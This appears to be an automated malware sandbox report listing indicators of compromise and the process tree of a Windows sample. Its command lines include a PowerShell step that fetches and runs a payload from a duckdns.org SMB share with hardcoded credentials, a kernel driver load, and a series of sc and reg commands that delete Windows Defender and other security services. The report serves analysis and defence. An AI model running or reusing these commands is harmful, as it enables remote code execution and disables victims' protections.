Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	262.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f31e7a8e6f.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	192b7f067e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CMD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ad20dbfd5e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	UZPt0hR.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9sWdA2p.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe

Checks processor information in registry 2 TTPs 18 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
3220	timeout.exe

Kills process with taskkill 5 IoCs

defense_evasion

pid	Process
5592	taskkill.exe
4696	taskkill.exe
5632	taskkill.exe
3796	taskkill.exe
4716	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	MeshAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000_Classes\Local Settings	rapes.exe
Key created	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000_Classes\Local Settings	firefox.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5448	random.exe
5448	random.exe
316	rapes.exe
316	rapes.exe
4056	powershell.exe
4056	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
5084	powershell.exe
5084	powershell.exe
5084	powershell.exe
4824	powershell.exe
4824	powershell.exe
4824	powershell.exe
6004	powershell.exe
6004	powershell.exe
6004	powershell.exe
5100	343621d628.exe
5100	343621d628.exe
3420	rapes.exe
3420	rapes.exe
4900	0f48488de8.exe
4900	0f48488de8.exe
4900	0f48488de8.exe
4900	0f48488de8.exe
4900	0f48488de8.exe
4900	0f48488de8.exe
3800	93bd456d31.exe
3800	93bd456d31.exe
3800	93bd456d31.exe
3800	93bd456d31.exe
4640	192b7f067e.exe
4640	192b7f067e.exe
6152	powershell.exe
6152	powershell.exe
6152	powershell.exe
4640	192b7f067e.exe
4640	192b7f067e.exe
4640	192b7f067e.exe
4640	192b7f067e.exe
6484	powershell.exe
6484	powershell.exe
6484	powershell.exe
3996	Passwords.com
3996	Passwords.com
3996	Passwords.com
3996	Passwords.com
3996	Passwords.com
3996	Passwords.com
4764	ad20dbfd5e.exe
4764	ad20dbfd5e.exe
5232	rapes.exe
5232	rapes.exe
1468	powershell.exe
1468	powershell.exe
1468	powershell.exe
3996	Passwords.com
3996	Passwords.com
3996	Passwords.com
3996	Passwords.com
5472	MSBuild.exe
5472	MSBuild.exe
5472	MSBuild.exe

Suspicious behavior: LoadsDriver 3 IoCs

pid	Process
660	Process not Found
660	Process not Found
5268	tzutil.exe

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
6420	UZPt0hR.exe
6420	UZPt0hR.exe
6420	UZPt0hR.exe

Suspicious use of AdjustPrivilegeToken 27 IoCs

description	pid	Process
Token: SeDebugPrivilege	4056	powershell.exe
Token: SeDebugPrivilege	4164	powershell.exe
Token: SeDebugPrivilege	5084	powershell.exe
Token: SeDebugPrivilege	4824	powershell.exe
Token: SeDebugPrivilege	6004	powershell.exe
Token: SeDebugPrivilege	5632	taskkill.exe
Token: SeDebugPrivilege	3796	taskkill.exe
Token: SeDebugPrivilege	4716	taskkill.exe
Token: SeDebugPrivilege	5592	taskkill.exe
Token: SeDebugPrivilege	4696	taskkill.exe
Token: SeDebugPrivilege	5116	firefox.exe
Token: SeDebugPrivilege	5116	firefox.exe
Token: SeDebugPrivilege	1608	7q8Wm5h.exe
Token: SeDebugPrivilege	6152	powershell.exe
Token: SeDebugPrivilege	6484	powershell.exe
Token: SeDebugPrivilege	7156	tasklist.exe
Token: SeDebugPrivilege	4476	tasklist.exe
Token: SeDebugPrivilege	1468	powershell.exe
Token: SeDebugPrivilege	5624	FrameworkName.exe
Token: SeDebugPrivilege	13196	powershell.exe
Token: SeDebugPrivilege	7824	powershell.exe
Token: SeDebugPrivilege	8988	powershell.exe
Token: SeDebugPrivilege	9464	powershell.exe
Token: SeDebugPrivilege	9856	powershell.exe
Token: SeDebugPrivilege	5072	RegAsm.exe
Token: SeLoadDriverPrivilege	5268	tzutil.exe
Token: SeDebugPrivilege	5076	powershell.exe

Suspicious use of FindShellTrayWindow 33 IoCs

pid	Process
5448	random.exe
3800	93bd456d31.exe
3800	93bd456d31.exe
3800	93bd456d31.exe
3800	93bd456d31.exe
3800	93bd456d31.exe
3800	93bd456d31.exe
3800	93bd456d31.exe
5116	firefox.exe
3800	93bd456d31.exe
5116	firefox.exe
5116	firefox.exe
5116	firefox.exe
5116	firefox.exe
5116	firefox.exe
5116	firefox.exe
5116	firefox.exe
5116	firefox.exe
5116	firefox.exe
5116	firefox.exe
5116	firefox.exe
5116	firefox.exe
5116	firefox.exe
5116	firefox.exe
5116	firefox.exe
5116	firefox.exe
3800	93bd456d31.exe
5116	firefox.exe
3800	93bd456d31.exe
3800	93bd456d31.exe
3996	Passwords.com
3996	Passwords.com
3996	Passwords.com

Suspicious use of SendNotifyMessage 26 IoCs

pid	Process
3800	93bd456d31.exe
3800	93bd456d31.exe
3800	93bd456d31.exe
3800	93bd456d31.exe
3800	93bd456d31.exe
3800	93bd456d31.exe
3800	93bd456d31.exe
3800	93bd456d31.exe
5116	firefox.exe
5116	firefox.exe
5116	firefox.exe
5116	firefox.exe
5116	firefox.exe
5116	firefox.exe
5116	firefox.exe
5116	firefox.exe
5116	firefox.exe
5116	firefox.exe
5116	firefox.exe
5116	firefox.exe
3800	93bd456d31.exe
3800	93bd456d31.exe
3800	93bd456d31.exe
3996	Passwords.com
3996	Passwords.com
3996	Passwords.com

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
5116	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5448 wrote to memory of 316	5448	random.exe	91
PID 5448 wrote to memory of 316	5448	random.exe	91
PID 5448 wrote to memory of 316	5448	random.exe	91
PID 316 wrote to memory of 5060	316	rapes.exe	96
PID 316 wrote to memory of 5060	316	rapes.exe	96
PID 316 wrote to memory of 5060	316	rapes.exe	96
PID 5060 wrote to memory of 4056	5060	cmd.exe	98
PID 5060 wrote to memory of 4056	5060	cmd.exe	98
PID 5060 wrote to memory of 4056	5060	cmd.exe	98
PID 4056 wrote to memory of 2024	4056	powershell.exe	100
PID 4056 wrote to memory of 2024	4056	powershell.exe	100
PID 4056 wrote to memory of 2024	4056	powershell.exe	100
PID 2024 wrote to memory of 2084	2024	cmd.exe	102
PID 2024 wrote to memory of 2084	2024	cmd.exe	102
PID 2024 wrote to memory of 2084	2024	cmd.exe	102
PID 316 wrote to memory of 2180	316	rapes.exe	105
PID 316 wrote to memory of 2180	316	rapes.exe	105
PID 316 wrote to memory of 2180	316	rapes.exe	105
PID 2180 wrote to memory of 5428	2180	apple.exe	106
PID 2180 wrote to memory of 5428	2180	apple.exe	106
PID 2180 wrote to memory of 5428	2180	apple.exe	106
PID 5428 wrote to memory of 2472	5428	262.exe	108
PID 5428 wrote to memory of 2472	5428	262.exe	108
PID 2472 wrote to memory of 5020	2472	cmd.exe	110
PID 2472 wrote to memory of 5020	2472	cmd.exe	110
PID 2472 wrote to memory of 5020	2472	cmd.exe	110
PID 5020 wrote to memory of 2948	5020	262.exe	111
PID 5020 wrote to memory of 2948	5020	262.exe	111
PID 2948 wrote to memory of 2892	2948	cmd.exe	113
PID 2948 wrote to memory of 2892	2948	cmd.exe	113
PID 2948 wrote to memory of 1912	2948	cmd.exe	114
PID 2948 wrote to memory of 1912	2948	cmd.exe	114
PID 2948 wrote to memory of 3220	2948	cmd.exe	115
PID 2948 wrote to memory of 3220	2948	cmd.exe	115
PID 2948 wrote to memory of 4924	2948	cmd.exe	116
PID 2948 wrote to memory of 4924	2948	cmd.exe	116
PID 2948 wrote to memory of 3080	2948	cmd.exe	117
PID 2948 wrote to memory of 3080	2948	cmd.exe	117
PID 2948 wrote to memory of 560	2948	cmd.exe	118
PID 2948 wrote to memory of 560	2948	cmd.exe	118
PID 2948 wrote to memory of 5512	2948	cmd.exe	119
PID 2948 wrote to memory of 5512	2948	cmd.exe	119
PID 2948 wrote to memory of 2464	2948	cmd.exe	120
PID 2948 wrote to memory of 2464	2948	cmd.exe	120
PID 2948 wrote to memory of 5724	2948	cmd.exe	121
PID 2948 wrote to memory of 5724	2948	cmd.exe	121
PID 2948 wrote to memory of 2144	2948	cmd.exe	122
PID 2948 wrote to memory of 2144	2948	cmd.exe	122
PID 2948 wrote to memory of 2088	2948	cmd.exe	123
PID 2948 wrote to memory of 2088	2948	cmd.exe	123
PID 2948 wrote to memory of 3972	2948	cmd.exe	124
PID 2948 wrote to memory of 3972	2948	cmd.exe	124
PID 2948 wrote to memory of 4128	2948	cmd.exe	125
PID 2948 wrote to memory of 4128	2948	cmd.exe	125
PID 2948 wrote to memory of 5360	2948	cmd.exe	126
PID 2948 wrote to memory of 5360	2948	cmd.exe	126
PID 2948 wrote to memory of 5284	2948	cmd.exe	127
PID 2948 wrote to memory of 5284	2948	cmd.exe	127
PID 2948 wrote to memory of 3276	2948	cmd.exe	128
PID 2948 wrote to memory of 3276	2948	cmd.exe	128
PID 2948 wrote to memory of 6136	2948	cmd.exe	129
PID 2948 wrote to memory of 6136	2948	cmd.exe	129
PID 2948 wrote to memory of 5036	2948	cmd.exe	130
PID 2948 wrote to memory of 5036	2948	cmd.exe	130

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\random.exe
"C:\Users\Admin\AppData\Local\Temp\random.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:5448
- C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
  "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Downloads MZ/PE file
  - Checks BIOS information in registry
  - Checks computer location settings
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Adds Run key to start application
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:316
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10449261121\pfJNmVW.cmd"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:5060
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Start-Process cmd -ArgumentList '/c net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234! && \\aaso12.duckdns.org\shear\s -fullinstall' -windowstyle hidden -Verb RunAs; # Cloudflare verification (Ray ID: 90b0e54eb8bdaasd84)
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4056
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234! && \\aaso12.duckdns.org\shear\s -fullinstall
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2024
      - C:\Windows\SysWOW64\net.exe
        
        net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234!
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2084
      - \??\UNC\aaso12.duckdns.org\shear\s.exe
        
        \\aaso12.duckdns.org\shear\s -fullinstall
        6⤵
        Sets service image path in registry
        Drops file in Program Files directory
        
        PID:6128
- - C:\Users\Admin\AppData\Local\Temp\10449770101\apple.exe
    "C:\Users\Admin\AppData\Local\Temp\10449770101\apple.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2180
  - - C:\Users\Admin\AppData\Local\Temp\262.exe
      "C:\Users\Admin\AppData\Local\Temp\262.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:5428
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AF5A.tmp\AF5B.tmp\AF5C.bat C:\Users\Admin\AppData\Local\Temp\262.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2472
      - C:\Users\Admin\AppData\Local\Temp\262.exe
        
        "C:\Users\Admin\AppData\Local\Temp\262.exe" go
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:5020
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B083.tmp\B084.tmp\B085.bat C:\Users\Admin\AppData\Local\Temp\262.exe go"
        7⤵
        Drops file in Program Files directory
        Suspicious use of WriteProcessMemory
        
        PID:2948
        
        C:\Windows\system32\sc.exe
        
        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
        8⤵
        Launches sc.exe
        
        PID:2892
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        8⤵
        Launches sc.exe
        
        PID:1912
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        8⤵
        Delays execution with timeout.exe
        
        PID:3220
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        8⤵
        Launches sc.exe
        
        PID:4924
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        8⤵
        Launches sc.exe
        
        PID:3080
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:560
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:5512
        
        C:\Windows\system32\sc.exe
        
        sc stop "WinDefend"
        8⤵
        Launches sc.exe
        
        PID:2464
        
        C:\Windows\system32\sc.exe
        
        sc delete "WinDefend"
        8⤵
        Launches sc.exe
        
        PID:5724
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
        8⤵
        
        PID:2144
        
        C:\Windows\system32\sc.exe
        
        sc stop "MDCoreSvc"
        8⤵
        Launches sc.exe
        
        PID:2088
        
        C:\Windows\system32\sc.exe
        
        sc delete "MDCoreSvc"
        8⤵
        Launches sc.exe
        
        PID:3972
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
        8⤵
        
        PID:4128
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisSvc"
        8⤵
        Launches sc.exe
        
        PID:5360
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisSvc"
        8⤵
        Launches sc.exe
        
        PID:5284
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
        8⤵
        
        PID:3276
        
        C:\Windows\system32\sc.exe
        
        sc stop "Sense"
        8⤵
        Launches sc.exe
        
        PID:6136
        
        C:\Windows\system32\sc.exe
        
        sc delete "Sense"
        8⤵
        Launches sc.exe
        
        PID:5036
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
        8⤵
        
        PID:1068
        
        C:\Windows\system32\sc.exe
        
        sc stop "wscsvc"
        8⤵
        Launches sc.exe
        
        PID:5632
        
        C:\Windows\system32\sc.exe
        
        sc delete "wscsvc"
        8⤵
        Launches sc.exe
        
        PID:688
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
        8⤵
        Modifies security service
        
        PID:5004
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmBroker"
        8⤵
        Launches sc.exe
        
        PID:3200
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmBroker"
        8⤵
        Launches sc.exe
        
        PID:4248
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
        8⤵
        
        PID:4808
        
        C:\Windows\system32\sc.exe
        
        sc stop "SecurityHealthService"
        8⤵
        Launches sc.exe
        
        PID:3976
        
        C:\Windows\system32\sc.exe
        
        sc delete "SecurityHealthService"
        8⤵
        Launches sc.exe
        
        PID:540
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
        8⤵
        
        PID:184
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefsvc"
        8⤵
        Launches sc.exe
        
        PID:816
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefsvc"
        8⤵
        Launches sc.exe
        
        PID:452
        
